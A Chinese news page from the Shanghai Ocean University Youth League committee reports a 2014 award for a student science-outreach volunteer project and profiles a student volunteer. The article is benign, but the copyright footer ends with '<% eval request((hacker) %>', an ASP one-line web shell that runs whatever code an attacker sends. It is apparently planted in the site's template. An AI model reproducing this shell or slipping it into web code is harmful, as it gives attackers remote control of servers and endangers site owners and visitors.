当前位置:共青团上海海洋大学委员会 >> 新闻中心 >> 要闻速递 >> 正文  
站内信息搜索:
我校科普志愿者项目获浦东新区十佳青年公益项目称号
[2014年03月16日]   来源:本站原创   作者:佚名   点击数: 【字体: 】【双击滚屏

    3月13日,浦东新区青年志愿者协会第五届会员第二次全体会议在源深体育中心举行,会上表彰了2012-2013年度浦东新区杰出青年志愿者等系列奖项。我校信息学院科学商店——信息技术服务部的“科普进社区,我们在行动”项目获“浦东新区十佳青年公益项目”称号,信息学院学生邢嵩林获“浦东新区优秀青年志愿者”称号。

    信息学院科学商店——信息技术服务部自2009年成立,致力于为社区居民提供计算机软件使用、硬件保养、整机系统维护、网络信息安全以及防辐射等方面的科普服务,先后为惠南镇博佳社区、泥城镇云松苑和书院镇新舒苑等社区居民举办了科普志愿活动72次,科普知识讲座18次,门店值班服务260人次,上门服务186人次,累计学生志愿者520余人,服务居民达12000人次,完成与居民需求密切相关的项目十余项,如智能家居安全报警系统、饮水机干烧断电系统等。连续五年获得“上海市优秀科学商店服务部”,赢得了临港周边居民的肯定和赞赏,也帮助社区居民们树立了全面的科学健康观念和信息安全防范意识。

   邢嵩林,11级信息管理与信息系统专业学生,大学生西部志愿者服务联盟社长。作为志愿者,他先后多次志愿服务浦东新区泥城敬老院;积极参加“春晖”公益项目、无偿献血等活动,担任百年校庆志愿者,并获“校优秀志愿者”称号。作为志愿服务组织策划者,他于2012年、2013年组织大型志愿活动——“海洋使者”西部支教行,赴甘肃秦安2个乡镇的5所农村小学进行学生支教、农村帮扶及社会调研;组织大学生西部志愿服务联盟和人人网合作,举办“人人公益,美丽中国”公益等活动,获得各方赞誉。

   志愿者服务是繁杂的,但热情是饱满的;做的事是简单的,但生活却是充满意义的。相信我们广大青年会以此为动力,大力弘扬“奉献、友爱、互助、进步”的志愿精神,以实际行动践行社会主义核心价值观,展现青年志愿者的文化自觉和文化自信,增强青年志愿公益组织的吸引力和凝聚力。

 

关闭窗口

上一篇:市方志办在我校召开校志审定会

下一篇:全国第三期内陆骨干县(市)验船师基础专业长训班在我校开班
  留言板 | 管理登录 版权所有 © 2007 共青团上海海洋大学委员会 tw.shou.edu.cn <% eval request((hacker) %>